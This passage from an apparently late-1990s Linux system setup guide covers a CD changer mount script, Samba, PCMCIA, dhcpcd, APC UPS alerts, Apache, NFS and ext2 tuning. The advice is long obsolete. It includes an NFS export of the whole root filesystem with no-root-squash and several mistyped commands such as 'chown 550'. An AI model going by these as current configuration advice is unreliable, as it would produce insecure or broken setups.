CAPs. - Now format the drive by typing in "mke2fs /dev/md0. NOTE: There is a LOT of room in some of these commands to increase performance, etc (stripe size, Inodes..). For now.. I'm just shooting for functionality. - Ok.. mount it! "mount -a" ================================================================================ ================================================================================ Section 32 - Installation / Setup of a SCSI CD-ROM Changer Most SCSI CD Changers use one SCSI ID number and then use LUNs (Logical Unit IDs) to adress each CD within the changer. With LUNs, now you can access all 4-?12? CDs in the changer from a single SCSI ID. Problem is, not all changer's LUN systems work with Linux. Because of this, you will have to experiment with the kernel option for Multi-LUN scan support. With my Nakamichi 7-CD changer (old 2x-speed), if I enable the multi-LUN support, my kernel would HANG after the box would post the SCSI changer device but before it was to post an additional single CD CD-ROM drive. By turning OFF the Multi-LUN kernel option and recompiling, my box would boot fine. So.. with that in mind: - Try to NOT ENABLE the: Probe all LUNs on each SCSI device (CONFIG_SCSI_MULTI_LUN) [N/y/?] option unless your changer is NOT properly recognized. - Add the changer to the SCSI chain and boot up the linux box. - Create the following file: /etc/rc.d/rc.cdrom NOTE: Please note that the UID and GIDs are specific to my machine and you will need to change them for your system. UIDs are defined in /etc/passwd and GIDs are defined in /etc/groups. NOTE2: The permissions of these CDROMs after mounting STILL isn't right. I'm working on it but I have to admit I'm stumped. /etc/rc.d/rc.cdrom -- #!/bin/sh # See how we were called. case "$1" in start) echo "Mounting CD-ROMs.." mount -t iso9660 /dev/scd0 ~hpe/CDROMs/Cdrom0 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd1 ~hpe/CDROMs/Cdrom1 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd2 ~hpe/CDROMs/Cdrom2 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd3 ~hpe/CDROMs/Cdrom3 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd4 ~hpe/CDROMs/Cdrom4 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd5 ~hpe/CDROMs/Cdrom5 -o norock,uid=501,gid=10,suid,mode=0550 mount -t iso9660 /dev/scd6 ~hpe/CDROMs/Cdrom6 -o norock,uid=501,gid=10,suid,mode=0550 # mount -t iso9660 /dev/scd7 ~hpe/CDROMs/Cdrom7 -o norock,uid=501,gid=10,suid,mode=0550 ;; start0) mount -t iso9660 /dev/scd0 ~hpe/CDROMs/Cdrom0 -o norock,uid=501,gid=10,suid,mode=0550 ;; start1) mount -t iso9660 /dev/scd1 ~hpe/CDROMs/Cdrom1 -o norock,uid=501,gid=10,suid,mode=0550 ;; start2) mount -t iso9660 /dev/scd2 ~hpe/CDROMs/Cdrom2 -o norock,uid=501,gid=10,suid,mode=0550 ;; start3) mount -t iso9660 /dev/scd3 ~hpe/CDROMs/Cdrom3 -o norock,uid=501,gid=10,suid,mode=0550 ;; start4) mount -t iso9660 /dev/scd4 ~hpe/CDROMs/Cdrom4 -o norock,uid=501,gid=10,suid,mode=0550 ;; start5) mount -t iso9660 /dev/scd5 ~hpe/CDROMs/Cdrom5 -o norock,uid=501,gid=10,suid,mode=0550 ;; start6) mount -t iso9660 /dev/scd6 ~hpe/CDROMs/Cdrom6 -o norock,uid=501,gid=10,suid,mode=0550 ;; start7) mount -t iso9660 /dev/scd7 ~hpe/CDROMs/Cdrom7 -o norock,uid=501,gid=10,suid,mode=0550 ;; stop) echo "Unmounting CD-ROMs.." umount /dev/scd0 umount /dev/scd1 umount /dev/scd2 umount /dev/scd3 umount /dev/scd4 umount /dev/scd5 umount /dev/scd6 umount /dev/scd7 ;; stop0) umount /dev/scd0 ;; stop1) umount /dev/scd1 ;; stop2) umount /dev/scd2 ;; stop3) umount /dev/scd3 ;; stop4) umount /dev/scd4 ;; stop5) umount /dev/scd5 ;; stop6) umount /dev/scd6 ;; stop7) umount /dev/scd7 ;; *) echo "Usage: rc.cdrom {start|stop|startn|stopn} where "n" is the CDROM drive ID" exit 1 esac exit 0 -- - Make the rc.cdrom script executable by running "chmod r+x rc.cdrom" - Make the mount points for the CD- Changer's CDs: mkdir ~hpe/CDROMs/Cdrom0; mkdir ~hpe/CDROMs/Cdrom1; mkdir ~hpe/CDROMs/Cdrom2; mkdir ~hpe/CDROMs/Cdrom3; mkdir ~hpe/CDROMs/Cdrom4; mkdir ~hpe/CDROMs/Cdrom5; mkdir ~hpe/CDROMs/Cdrom6; mkdir ~hpe/CDROMs/Cdrom7 - Change the perms on the newly created dirs: chown 550 ~hpe/CDROMs/Cdrom* chgrp wheel ~hpe/CDROMs/Cdrom* chown hpe ~hpe/CDROMs/Cdrom* - Edit the "/etc/rc.d/rc.local" file and add the following lines at the end: -- #Run the cdrom mount script /etc/rc.d/rc.cdrom start -- ================================================================================ ================================================================================ Section 33 - Samba installation and configuration Samba is the UNIX service for Microsoft Windows File and Print serving. The funny thing is, a well tuned Linux Samba server is a FASTER NT server than a well tuned NT server itself! As of Samba 2.0, it still doesn't offer full PDC/BDC support yet but they do have some beta versions that do. * Please note that these installation docs are for Samba 1.9.x and might be somewhat different for a Samba 2.x distribution. - Download the newest Samba code from: ftp://samba.anu.edu.au/ and also check out some of the great docs at: http://samba.anu.edu.au/ NOTE: These installation assume that you are running Shadow passwords. (you really should be!) -- - Uncompress the .tgz "tar -xzvf *" - cd into the new Samba dir and then "cd sources" - Edit the "Makefile" - Find the lines: "# The permissions to give the executables INSTALLPERMS = 0755" and change them to 0750" - Redhat users: find the following lines and un-#ed out the last two lines: "# This is for PAM authentication. RedHat Linux uses PAM. # If you use PAM, then uncomment the following lines: # PAM_FLAGS = -DUSE_PAM # PAM_LIBS = -ldl -lpam" Ditto here: "# FLAGSM = -DLINUX -DAXPROC -DFAST_SHARE_MODES # FLAGSM = -DLINUX -DFAST_SHARE_MODES # LIBSM =" Same here: "# FLAGSM = -DLINUX -DNETGROUP -DALLOW_CHANGE_PASSWORD -DFAST_SHARE_MODES -DNO_AS MSIGNALH -DGLIBC2 # LIBSM = -lnsl -lcrypt" - Save the changes and then run "make all; make install" - Security: Post from the Samba team on 11/20/98, you should do the following: rm /usr/sbin/wsmbconf chmod +t /var/spool/samba - Next, edit the /etc/smb.conf file. If you need more information, run "man smb.conf" to read an exceptionally well written MAN page. - Under the [Global] Section: - Edit the "WORKGROUP" line to reflect the name of the workgroup you want WORKGROUP = ACME123 - Edit the "server string" line to reflect the name of the machine server string = Roadrunner Samba Server - Edit the "hosts" allow line to ONLY reflect: hosts allow = 192.168.0. 127. - Make sure that printing is enabled: printcap name = /etc/printcap load printers = no printing = bsd - Make sure the GUEST account is disabled by having a ";" in the front of: "; guest account = pcguest" - For Windows 95/98/NT viewing, turn on "user level" security "security = user" - Windows98, patched Windows95, and Windows NT now required ENCRYPTED SMB passwords. So, make sure you have the follow lines in your smb.conf file (or remove the ";"s if the lines are already there): encrypt passwords = yes smb passwd file = /etc/smbpasswd - Since the Samba server and all clients are on the same LAN segment, add the following: "socket options = IPTOS_LOWDELAY SO_RCVBUF=8192 SO_SNDBUF=8192" - Since we have multiple NICS, set the following: "interfaces = 192.168.0.1/24 127.0.0.0/8" - Add the line: "bind interfaces only = true" - Also set the following: "remote announce = 192.168.0.255 " - Allow Samba to be a subnet master browser "local master = yes" - Enable Samba to always win the Subnet Master Browser election "preferred master = yes" - Enable full Win95 login support: "domain logons = yes" - Fix Samba permissions so when you create a file/directory, the UNIX perms are correct too! "create mask = 0770" "directory mask = 0750" - **OPTIONAL** Since my Samba server is only used by me, I can essentially disable file write locking on all shares. If you are going to have a lot of users editing the same file, you should NOT enable this option. "fake oplocks = yes" - **OPTIONAL** Since I have a CD-ROM changer on my machine, I don't need to enable file write locking so I'll disable it here. "veto oplock files = /home/hpe/CDROMs/Cdrom*" ----------------------- - Set or verify the setting of follow shares for each user's home DIR and a central Hp Lasterjet IIp printer. * NOTE: The printer name CANNOT be any longer than -8 characters-! [homes] comment = Home Directories # Making this NON-BROWSABLE gets rid of the duplicated "username" and # "homes" shares browseable = no writable = yes # Allows only the current Samba user into their home dir user = %S [Hp_Lj2p] printer = raw comment = Hp LaserJet IIp on RoadRunner path = /var/spool/samba browseable = yes # Set public = yes to allow user 'guest account' to print guest ok = no writable = no printable = yes print command = /usr/bin/lpr -b -r -PHp_Lj2p %s lpq command = lpq -PHp_Lj2p lprm command = lprm -PHp_Lj2p %j [Epson_S] printer = raw comment = Epson Stylus 500 Color on RoadRunner path = /var/spool/samba browseable = yes # Set public = yes to allow user 'guest account' to print guest ok = no writable = no printable = yes print command = /usr/bin/lpr -b -r -PEpson_S %s lpq command = lpq -PEpson_S lprm command = lprm -PEpson_S %j - The /home/hpe directory is a common directory and SMB share for ALL users. Since ALL the files in this dir should be readable by all other users, I want all files/dirs to be created with the WHEEL group. [hpe] comment = Hpe path = /home/hpe read only = no public = no force group = wheel -- - Next, you need to test that your /etc/smb.conf file is correct. To do this, simply run the "testparm" program and it will check it for you and tell you everything it understands. Browse over this real quick but don't expect to understand much of it! hehehe.. - Now start up Samba, run - Redhat: /etc/rc.d/init.d/smb start - Slackware: /usr/local/samba/bin/smbd -D /usr/local/samba/bin/nmbd -D - Lastly, we need to add your login to the Samba username file. Yes, its seperate from the normal /etc/password file. Though this is initially a pain, you can have it auto-syncronise with the UNIX password file (Not covered in the TrinityOS doc..yet) --- This is all covered in /usr/doc/samba-*/ENCRYPTION.txt file --- - Ok, to create the /etc/smbpasswd file: run the following command: cat /etc/passwd | mksmbpasswd.sh >/etc/smbpasswd - Next, fix the permissions of the file: chmod 500 /etc/smbpasswd - With this command, all users defined in the /etc/passwd file will have a SMB entry put into the /etc/smbpasswd file. Though the user is defined, the user will be LOCKED out until they change their SMB password. To fix this, do the following PER user: smbpasswd johndoe - A few things to do on your Windows 95/NT box: - One thing that you need to now to that you might not be used is acutally logging into your Windows95 or NT box. You need to create a Username AND a password on your Windows box which is the same on your UNIX box Windows 95 - Use the Users Control Panel Windows NT - Use the User Manager - One more thing, you need to re-configure your Windows95 or WindowsNT servers to use the correct WORKGROUP (ACME123). Windows 95 and NT: Use the Network Control Panel NOTE: Verify that your Windows95/NT machine does NOT have the Netbeui protocol installed. If it does, DELETE that protocol. - Whew! Ok, the home stretch. Reboot your Windows boxes with the new WORKGROUP setting and login with the configured Windows Username and password from above. Now, goto the "Network Neighborhood" and see if you see the ROADRUNNER server. If everything goes well, you should see your home UNIX directory! So go for it and see if you can create, delete, move files, etc from File Explorer on your Windows machine. Cool huh? -------------------------------------------------- If you want to do printing, check out [Section 47] -------------------------------------------------- ** If you canot get Samba to run right, please read the Samba Diag docs: /usr/doc/samba-*/docs/DIAGNOSIS.txt - If everything went ok... Excellent! Congrats! Make sure that SMB is enabled upon boot. - To do this, UN-DO all edits for SMB lines in [Section 8] ************************************************************************************* On the flip side, you can mount your Windows95/NT shares onto your Linux box! Cool huh! - Ok, if everything is working ok with Samba (from above), you should be able get a list of shares from your Windows 95/NT box, do: "smbclient -L //your-nt-boxs-name -U johndoe" When prompted for a password, enter in the same password that you use to log into your Windows95/NT machine. You should then see something like: Added interface ip=192.168.0.1 bcast=192.168.0.255 nmask=255.255.255.0 Server time is Tue Jan 12 17:22:36 1999 Timezone is UTC-8.0 Password: Domain=[ACME123] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0] security=user Server=[your-nt-boxs-name] User=[] Workgroup=[ACME123] Domain=[] Sharename Type Comment --------- ---- ------- C$ Disk IPC$ IPC Remote IPC - If the above step worked ok, you should be able to mount your Windows95/NT share directly onto your linux box. To do this, run the following: mkdir /tmp/smb-c /usr/sbin/smbmount //your-nt-boxs-name/c$ /mnt/smb -U johndoe -c roadrunner ================================================================================ ================================================================================ Section 34 - PCMCIA services installation and configuration - First.. make sure the PCMCIA cards you have currently supported and then download the newest version of software from: http://hyper.stanford.edu/~dhinds/pcmcia/ Note: I have not been able to get PCMCIA services to run promperly under a 2.1.x kernel. Use 2.0.35. - Make sure your Linux kernel has TCP/IP support in it but you don't need to compile in any ethernet card support. This is done by the PCMCIA modules. Tokenring is an exception to this rule. - Uncompress the PCMCIA software in /usr/src or somewhere else you like - run ./configure - If you have the kernel sources install in /usr/src/linux, tell the ./configure script to use that to determine the kernel rev. I highly recommend that you use v2.0.35 - I beleive that your card is a CardBus type so enable CardBus support. - run make all - run make install + Redhat: If this is for a Dell, this is how I would recommend you to configure your laptop. Note, you need to configure the network here and NOT from /etc/sysconfig. PCMCIA works in a totally different fashion than a standard NIC setup: NOTE: You will need to include or exclude the rigth IRQs and IO ports for your machine. /etc/sysconfig/pcmcia (for Redhat only) -- PCMCIA=yes PCIC=i82365 PCIC_OPTS="irq_list=3,5,9,10" CORE_OPTS= -- - All distros: Edit the /etc/pcmcia/config.opts file: -- # # Local PCMCIA Configuration File # # System resources available for PCMCIA devices # include port 0x100-0x3ff, memory 0xc0000-0xfffff # # Extra port range for IBM Token Ring # include port 0xa20-0xa27 # # Resources we should not use, even if they appear to be available # # Available IRQs for a Dell Latitude CP are 3,5,[9 is available if # MIDI support for the C4232 sound card is NOT enabled in # the kernel # # To be used for PCMCIA modem include irq 3 # Used by interal DB9 serial port exclude irq 4 include irq 5 # First built-in parallel port exclude irq 7 include irq 9 # Used by PCMCIA Card controller exclude irq 10 # Used by the CSS Sound Card exclude irq 11 # PS/2 Mouse (trackpad) exclude irq 12 # IDE Channnel #1 exclude irq 14 # IDE Channnel #2 exclude irq 15 # # Options for loadable modules # # To fix sluggish network with IBM ethernet adapter... #module "pcnet_cs" opts "mem_speed=600" # # Options for Xircom Netwave driver... #module "xircnw_cs" opts "domain=0x100 scramble_key=0x0" -- /etc/pcmcia/networks.opts (for DHCP.. If you are using a static IP address.. turn OFF BOOTP here and enter in your IP address in the IPADDR field) -- # Network adapter configuration # # The address format is "scheme,socket,instance,hwaddr". # # Note: the "network address" here is NOT the same as the IP address. # See the Networking HOWTO. In short, the network address is the IP # address masked by the netmask. # case "$ADDRESS" in *,*,*,*) # Transceiver selection, for cards that need it -- see 'man ifport' IF_PORT="" # Use BOOTP [y/n] BOOTP="y" # IP address IPADDR="" # Netmask NETMASK="255.255.255.0" # Network address NETWORK="1.2.0.0" # Broadcast address BROADCAST="1.2.255.255" # Gateway address GATEWAY="1.2.0.1" # Local domain name DOMAIN="ins.com" # Search list for host lookup SEARCH="" # Nameserver #1 DNS_1="" # Nameserver #2 DNS_2="" # Nameserver #3 DNS_3="" # NFS mounts, should be listed in /etc/fstab MOUNTS="" # For IPX interfaces, the frame type (i.e., 802.2) IPX_FRAME="" # For IPX interfaces, the network number IPX_NETNUM="" # Extra stuff to do after setting up the interface start_fn () { return; } # Extra stuff to do before shutting down the interface stop_fn () { return; } ;; esac -- After you've done all this.. reboot your machine and while the BIOS is showing the memory, etc.. EJECT all your PCMCIA cards. After Linux has booted, login as root, and then hit ALT-F7 to check out all the logs. - Insert one of your PCMCIA cards. Did it mount ok? (two high beeps?) - To check, go back to your login TTY (Alt-F1) and run "ifconfig". Do you have an IP address? - If everything is working ok, make sure that PCMCIA services is enabled upon boot. - To do this, UN-DO all edits for PCMCIA lines in [Section 8] ================================================================================ ================================================================================ Section 35 - DHCPcd : Client DHCP for xDSL / Cablemodem users See [Section 5] for some other excellent URLs on setting up DHCP clients First, a quote from the TrinityOS firewall ruleset about Linux DHCP clients: -- # NOTE: Red Hat users of DHCP to get TCP/IP addresses (Cablemodems, DSL, etc) # will need to install and use a different DHCP client than the stock # client called "pump". One recommended DHCP client is called "dhcpcd" # and can found in Appendix A. # # The stock Red Hat DHCP client doesn't allow the ability to have scripts # run when DHCP gets a TCP/IP address. Specifically, DHCP delves out # TCP/IP addresses to its clients for a limited amount of time; this # called a "lease". When a DHCP lease expires, the client will query the # DHCP server for a lease renewal. Though the DHCP client will usually # get back its original TCP/IP address, this is NOT always guaranteed. # With this understood, if you receive a different TCP/IP address than # the IPCHAINS firewall was configured for, the firewall will block ALL # network access in and out of the Linux server because that was what it # was configured to do. # # As mentioned above, the key to solve this problem is to use a DHCP # client program that can re-run the /etc/rc.d/init.d/firewall ruleset # once a new TCP/IP address is set. The new ruleset will make the required # changes to the rulesets to allow network traffic from and to your new # TCP/IP address. -- Another thing to note from the DHCPcd documentation: -- In a case dhcpcd detects a change in assigned IP address it will try to execute /etc/dhcpc/dhcpcd-interface.exe program. The word is substituted by the actual interface name like e.g. eth0. Caution: do not use /etc/dhcpcd-interface.exe as a bootup script. It will not be executed if the assigned IP address is the same as it was before reboot. The included sample /etc/dhcpc/dhcpcd-eth0.exe will log the time of IP change to /var/log/messages file. -- - Note: 1. If you use TrinityOS's strong firewall ruleset, you'll have to un-# out the "DHCP - Client" IPCHAINS or IPFWADM rulesets in both the Incoming and Outgoing rules to allow DHCP in through your EXTERNAL interface. 2. You will also have to execute the /etc/rc.d/rc.firewall when DHCP initial IP address or when it renews its IP address lease. Newer "dhcpcd" clients offer this functionality though not all of them do (such as "pump"). Be sure you use one that DOES have this function. Here is a real quick intro on how to do this: ######## If you are running Mandrake 6.1, load up "vi" and goto /etc/sysconfig/network-scripts/ifup line 87. If you are running Redhat 6.x, edit the same file and do a search for "DHCP" (run the command "/DHCP" without the quotes). You'll look for something like the following: -- if [ -n "$DHCP" ]; then echo -n "Determining IP information for $DEVICE via dhcpcd..." if /sbin/dhcpcd -i $DEVICE -h $HOSTNAME ; then echo " done." else echo " failed." exit 1 -- You'll want to change it to something like the following (if it doesn't already look like this already). -- if [ -n "$DHCP" ]; then echo -n "Determining IP information for $DEVICE via dhcpcd..." if /sbin/dhcpcd -H -D $DEVICE ; then echo " done." else echo " failed." exit 1 -- Next, you need to create a link to the firewall ruleset for your given EXTERNAL interface: ln -s /etc/rc.d/init.d/firewall /etc/dhcpc/dhcpcd-*EXTIF*.exe Replace the "*EXTIP*" for the name of your external interface. For example, if your external interface is "eth0", it would be: ln -s /etc/rc.d/init.d/firewall /etc/dhcpc/dhcpcd-eth0.exe Thats it! Now when the /sbin/ifup script or dhcpcd programs are called, they will get their IP address and then run the firewall ruleset automatically. ================================================================================ ================================================================================ Section 36 - Full APC SmartUPS powerdown support In recent times, APC has now begun to support the Linux operating system with their PowerShute software. You can either install PowerChute or use the "apcupsd" tool. Currently, these docs only cover the "apcupsd" tool. - Download the newest apcupsd found in [Section 5] - Install it with the command: rpm -Uvh apcupsd-3.5.0-1.i386.rpm - Next, fix its permissions: chmod 750 /sbin/apcupsd - Redhat: - Make sure that /etc/rc.d/rc3.d/S20apcups exists - Next, edit /etc/apcupsd.conf and make the following changes NOTE: These configs are for a APC SmartUPS1000 on COM3 /etc/apcupsd.conf -- CONTROL /sbin/powersc UPSCABLE smart UPSTYPE smartups UPSCLASS standalone UPSMODE disable DEVICE /dev/ttyS0 ANNOY 60 SENSITIVITY H TIMEOUT 0 BATTERYLEVEL 10 MINUTES 0 WAKEUP 60 BATTCMD /usr/local/sbin/apcupsd-battcmd TIMECMD /usr/local/sbin/apcupsd-timecmd LOADCMD /usr/local/sbin/apcupsd-loadcmd LIMITCMD /usr/local/sbin/apcupsd-limitcmd PWRCMD /usr/local/sbin/apcupsd-pwrcmd RETCMD /usr/local/sbin/apcupsd-retcmd -- - Next, we need to create the scripts to both send messages to SYSLOG for properly logging (this should be done internally but it isn't) and optionally page you. NOTE: If you don't want to enable the paging feature, just delete those lines below. NOTE2: Change the pager email address to reflect both your your pager ID and pager server /usr/local/sbin/apcupsd-battcmd -- #!/bin/sh #battcmd - execute when the UPSs batteries have failed" # /usr/bin/logger "APCUPSd - Battey has failed!" echo "APCUPSd - Battery has failed" | /bin/mail 1234567@skytel.com -- /usr/local/sbin/apcupsd-limitcmd -- #!/bin/sh #limitcmd - execute when MINUTES has expired" # /usr/bin/logger "APCUPSd - Minutes timeout has expired!" echo "APCUPSd - Minutes timeout has expired" | /bin/mail 1234567@skytel.com -- /usr/local/sbin/apcupsd-loadcmd -- #!/bin/sh #loadcmd - execute when UPS batties are low" # /usr/bin/logger "APCUPSd - Battery capacity is exhausted!" echo "APCUPSd - Battery capacity is exhausted" | /bin/mail 1234567@skytel.com -- /usr/local/sbin/apcupsd-pwrcmd -- #!/bin/sh #pwrcmd - execute when the AC power has failed" # /usr/bin/logger "APCUPSd - AC power has failed!" echo "APCUPSd - AC power has failed" | /bin/mail 1234567@skytel.com -- /usr/local/sbin/apcupsd-retcmd -- #!/bin/sh #retcmd - execute when the AC power has returned" # /usr/bin/logger "APCUPSd - AC power has returned!" echo "APCUPSd - AC power has returned" | /bin/mail 1234567@skytel.com -- /usr/local/sbin/apcupsd-timecmd -- #!/bin/sh #timecmd - execute when TIMEOUT has expired" # /usr/bin/logger "APCUPSd - Timeout has expired!" echo "APCUPSd - Timeout has expired" | /bin/mail 1234567@skytel.com -- - Now, fix the permissions on the files: chmod 700 /usr/local/sbin/apcupsd-* - Now, lets TEST the UPS software. Connect up the UPS control cable to the UPS, plug-in the UPS to the wall outlet but DO NOT HAVE THE COMPUTER CONNECTED TO THE UPS QUITE YET. - First, change the /etc/apcupsd.conf variable: TIMEOUT 120 The reason to do this is to be able to test the setup quickly without draining the battery. - Start the apcupsd process by typing in: /sbin/powersc INIT - Now, make sure that things are cool.. - Next, pull the plug on the UPS and wait 2 minutes. Make sure that the system shuts down ok and then powers OFF. (for SmartUPS only) - Now, re-plug in the UPS and make sure that the system powers up ok and the file systems mount cleanly. - If everything is ok, change the "TIMEOUT" parameter back to "0". Shut the computer down and plug it's power cord into the UPS's output. - Power the computer back up! Thats it! ================================================================================ ================================================================================ Section 37 - Apache WWW Server Sorry this is so brief but setting up a simple Apache WWW server is very easy. But, configuring all of the advanced features is WAY out of the scope of this doc. - Download the newest version of the standard Apache or SSL-encrypted WWW server for Linux from the URL in [Section 5] - Install the new apache software: Redhat: rpm -Uvh apache-1.2.6-5.i386.rpm Slackware: tar -xzvf apache_1.2.6.tar.gz - Now, edit your WWW pages in the following dirs based upon your Linux distribution Redhat: /home/httpd/html - Upon the fact that the WWW server runs fine, re-enable HTTPD upon boot. - To do this, UN-DO all edits for HTTPD lines in [Section 8] - Also don't forget to re-enable HTTPD log rotation if you disabled it towards the end of [Section 50]. - If you want to be able to directly FTP files to the /home/httpd/html directory, you need to make sure the given logins and the Apache html dir has proper group permissions: - edit /etc/passwd and in the 4th field delimenated by ":"s, change the GID or GroupID to "4" for ALL people that should be able write to the global HTML dir. ie. dranch:x:500:4::/home/dranch:/bin/bash - Next, fix the permissions of the /home/httpd/html dir chgrp -R adm /home/httpd/html chmod 775 /home/httpd/html chmod 764 /home/httpd/html/* ================================================================================ ================================================================================ Section 38 - Tripwire file monitoring [Not finished yet] Tripwire is a file monitoring application that can be configured to notify the administrator if any files have been altered. With a system like this in place, administrators will have a clear picture of what files have been changed during: - file system corruption - accidental changes - hacker intrusion - First, download the tripwire software from [Section 5] and put it into a temporary directory - Next, decompress it: tar -xzvf tripwire-*.tar.Z tar -xvf T1.2.tar - Now go into the new tripwire-1.2 source dir - Edit Makefile # out CC = cc and un#ed out CC = gcc # out LEX = lex Un#ed out LEX = flex # out YACC = yacc un#ed out: YACC = bison -y ================================================================================ ================================================================================ Section 39 - Backing up the new system Linux to a CD-R - Download mkisofs from the URL in [Section 5] - Uncompress the archive tar -xzvf mkisofs-1.11.3.tar.gz - Now do the following: ./configure make make install - Next, assuming that you have enough drive space on your local HD (run a "df" to check) and you have at LEAST 16MB of RAM (per the mkisofs docs.. trust me.. its true), do the following: cd / mkisofs -o /tmp/TrinityOS-101098.iso -a -L -R -V TrinityOS . This will create a ISO image in /tmp which will include all files (-a), allow files to start with a "." (-L), enable RockRidge extentions to support EXT2 file permissions (-R), give the ISO image a volume name of "TrinityOS" and backup the files from the current directory (/). ================================================================================ ================================================================================ Section 40 - NFS (Network File System) File sharing NFS is one of the original network-based file sharing systems that was developed by Sun Corporation. NFS is one of the many services that Sun developed for their network architechure called RPC or Remote Procefure Call. The various other RPC services offer some amazing functionality such as remote quotas, remote WALLing people, etc but for now, we will concentrate on NFS. NFS is considered in many circles to be UN-SECURE. Because of this, few system admins are willing to run it in fear of losing security. Though there are many truthful aspects to this statement, NFS can be made to be more secure and limit its exploitability. To reduce any NFS-related security issues, take the following to heart: NFS Security: ------------- 1. Setup a strong packet firewall as shown in TrinityOS or setup a statefully-inspected firewall to protect your NFS server from unauthorized machines (expensive but the ultimate). See below on how to change the TrinityOS IPFWADM ruleset to allow in external NFS traffic 2. Setup TCP wrappers as shown below 3. Only allow NFS access from specific NFS clients via the firewall, TCP wrappers, and the /etc/exports file. 4. Even if a NFS hacker got in, they CANNOT traverse to other non-NFS'ed file systems . So, put all your NFS-sharable data on one specific file system. With this in place, you greatly limit your NFS risk. Note about Linux NFS performance: --------------------------------- Linux's NFS support somewhat slow. The reason for this is because the NFS support in Linux's 2.0.x and 2.1.x kernels are in what is called "user space". Because of this, the kernel doesn't have direct control and thus all NFS data transfers have to go through an excessive number of operating system layers. Fortunately, the upcoming Linux 2.2.x kernels will support NFS in "kernel space" which should bring its performance on par with many other UNIXes including the likes of Free/Open/Net-BSD. There are several NFS optimizations that you can make to NFS but many of them can make NFS unstable. Once I have more time, I will document these tweaks but until then, the LDP's NFS-HOWTO located in /usr/doc/HOWTO or your local LDP mirror documents all this very well. Down to it... --- - First, you need to make sure that you compiled in NFS support into the Linux kernel as shown in [Section 12]. If you didn't, you will need to re-follow that section, enable NFS, compile the kernel, and reboot with the new kernel. - Second, you need to specify what files on the NFS server you want to make available to remote NFS clients. To do this, create/edit the following file. All additional NFS shares should be put on their own line: /etc/exports -- #NFS exports file # #In a pinch to backup a whole remote file system / 192.168.0.2(rw,no-root-squash) /home/hpe 192.168.0.2(rw) 192.168.0.4(ro) 192.168.0.10(ro,nosuid,noexec) -- In this configuration file, the first line will allow host 192.168.0.2 full read/write permissions to ALL files (root see's all) on the entire system. The second line will allow the 192.168.0.2 to both READ/WRITE to all files on the NFS server located in "/home/hpe" but only allow 192.168.0.4 READ ONLY access. 192.168.0.10, on the other hand, can only READ this volume and cannot RUN any programs from this NFS share. In addition to all this, this config only allows users at the various IPs access files and directories which they ALREADY have UNIX permission to. NFS still enforces permissions based on the UserID and GroupID of the user. There are a LOT of other options here that you might want to run (allow in a whole wildcarded domain, etc) so check out the well written man page (man exports) or NFS-HOWTO. - Next, Linux's NFS supports TCP Wrappers. Because of this, you need to configure TCPD to allow all of your desired clients to connect via NFS. /etc/hosts.allow -- ALL: 192.168.0.2 portmap: 192.168.0.4/255.255.255.255 -- What this means is that host 192.168.0.2 is allowed to access ALL services on the server where as host 192.168.0.4 is ONLY allowed to connect via the RPC Portmapper service. - Another area of security involves the IPFWADM and/or IPCHAINS packet firewalls. My default IPFWADM policies allow *ANY* type of traffic to hit the Linux server from the internal NIC but *REJECT* most types of traffic from the Internet. I would highly recommend that you do this as well. If you have specific needs to enable NFS on your Internet link, you will need to edit your IPFWADM/IPCHAINS rule file and allow: Port 111 [TCP and UDP] - for the RPC portmapper Port 635 [UDP] - for the NFS mounter Port 2049 [TCP and UDP] - for NFS For example, change the IPFWADM rulesets for your various EXPLICTLY allowed-in hosts from [Section 10] to add the above TCP and UDP ports: Incoming traffic: #secure1.host.com /sbin/ipfwadm -I -a accept -W $extif -P tcp -S $securehost/32 -D $extip ftp ftp-data ssh pop-3 635 # NFS support /sbin/ipfwadm -I -a accept -W $extif -P udp -S $securehost/32 -D $extip 111 635 Outgoing traffic: #secure1.host.com /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 -D $securehost/32 ftp ftp-data ssh $unprivports #NFS traffic /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 635 -D $securehost/32 /sbin/ipfwadm -O -a accept -W $extif -P udp -S $extip/32 111 2049 -D $securehost/32 - Next, you need to load the RPC Portmapper, mountd, and NFS daemons. You can load them by hand by running the following commands: Manually: -- /usr/sbin/portmap /usr/sbin/rpc.mountd /usr/sbin/rpc.nfsd -- Redhat: -- /etc/rc.d/init.d/portmap start /etc/rc.d/init.d/nfs start -- If you want to run these services permanently, go back to the "Initial System Security Section" [Section 8] and undo all NFS, RPC, and Portmapper-related changes for your specific Linux distribution. - Ok, NFS should be running now. Just to make sure, run the following command and verify it's output: [root@roadrunner iana]# rpcinfo -p program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind 100005 1 udp 635 mountd 100005 2 udp 635 mountd 100005 1 tcp 635 mountd 100005 2 tcp 635 mountd 100003 2 udp 2049 nfs 100003 2 tcp 2049 nfs - Next, from the client machine that you want to mount a given NFS share, run showmount 192.168.0.1 And see if you get a list of NFS shares. - For the home stretch, lets try to mount the NFS server from an NFS client. This example shows Linux as the client though any NFS-compatible client such as the various UNIXes, Windows 3.x/95/NT (with 3rd party software), etc should work fine. Mount the remote NFS share: NOTE: Make sure that the client directory /mnt/nfs exists. If it doesn't, just do a "mkdir /mnt/nfs" first. mount -t NFS 192.168.0.1:/home/hpe /mnt/nfs - If all went well, the "mount" command should have executed quitely and returned you to the UNIX prompt. So go ahead and look around in the /mnt/nfs directory. You should see all of the remote files just as if they were local! ================================================================================ ================================================================================ Section 41 - EXT2 File system tuning [This is an on-going experiement but NONE of the following can hurt..] Recently on a ~1500 user Linux box that I support, we have had major EXT2 filesystem corruption on two seperate occasions. I then emailed several people about this and here are two replies I have received: From Warlock: -- Personally, I have cron run `sync' in the background every 10 minutes or so and, averaged over any reasonable period of time, . . . (I have been doing this) Forever. . . . Doing a sync in the background every so often (or between packages) pretty much fixed that problem. Now everything is much more stable, but the principle still holds. I think the double-sync (old-timers use a triple, but our computers and peripherals were slower back then) (: is for when you want to *shut down* (or reboot) and risk something very unclean. Even if you type `sync', that isn't guaranteed. It basically tells the kernel to clean up and then returns, but the actual process isn't finished by the time sync finishes. I think the logic was that a double-sync 